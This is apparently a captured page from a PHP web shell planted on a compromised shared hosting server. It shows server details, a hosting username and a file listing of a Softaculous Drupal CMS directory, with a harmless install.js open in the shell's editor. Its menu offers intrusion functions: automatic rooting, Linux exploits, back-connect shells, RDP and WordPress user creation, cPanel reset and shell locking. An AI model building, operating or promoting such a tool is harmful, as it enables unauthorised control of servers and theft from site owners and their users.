Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.56 | : 216.73.216.17
Cant Read [ /etc/named.conf ]
8.1.33
syrihapj
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
drupalcms /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
.htaccess
685
B
-rw-r--r--
NOTES.txt
1.86
KB
-rw-r--r--
README.txt
278
B
-rw-r--r--
_htaccess
486
B
-rw-r--r--
composer.phar
2.98
MB
-rw-r--r--
drupalcms.sql
4.16
MB
-rw-r--r--
drupalcms.zip
70.26
MB
-rw-r--r--
extend.php
14.84
KB
-rw-r--r--
fileindex.php
278
B
-rw-r--r--
import.php
3.53
KB
-rw-r--r--
info.xml
3.53
KB
-rw-r--r--
install.js
1.33
KB
-rw-r--r--
install.php
10.78
KB
-rw-r--r--
install.xml
1.11
KB
-rw-r--r--
md5
1.05
KB
-rw-r--r--
settings.php
34.26
KB
-rw-r--r--
update_pass.php
541
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : install.js
////////////////////////////////////////////////////////////// // install.js // Checks the installation form of the software being // installed by SOFTACULOUS // NOTE: 1) Only formcheck() function will be called. // 2) A software Vendor can use the same name for every // field to be checked as in install.xml . It can be // called using $('fieldname').value or any property // 3) Must Return true or false // ---------------------------------------------------------- // Please Read the Terms of use at http://www.softaculous.com // ---------------------------------------------------------- // (c)Softaculous Inc. ////////////////////////////////////////////////////////////// function formcheck(){ //Check the Admin Email if(window.check_punycode){ if(!check_punycode($('admin_email').value)){ alert('{{err_ademail}}'); return false; } return true; } return true; }; // Update the in dir function update_drupalcms_indir(){ if(drupalcms_retries >= 5){ return; } if(typeof jQuery('#softdirectory').val() == "undefined"){ drupalcms_retries++; setTimeout('update_drupalcms_indir();', 500); return; } var softdirectory = jQuery('#softdirectory').val(); if(softdirectory == 'drupalcms'){ jQuery('#softdirectory').val('drupal'); } } var drupalcms_retries = 0; update_drupalcms_indir();
Close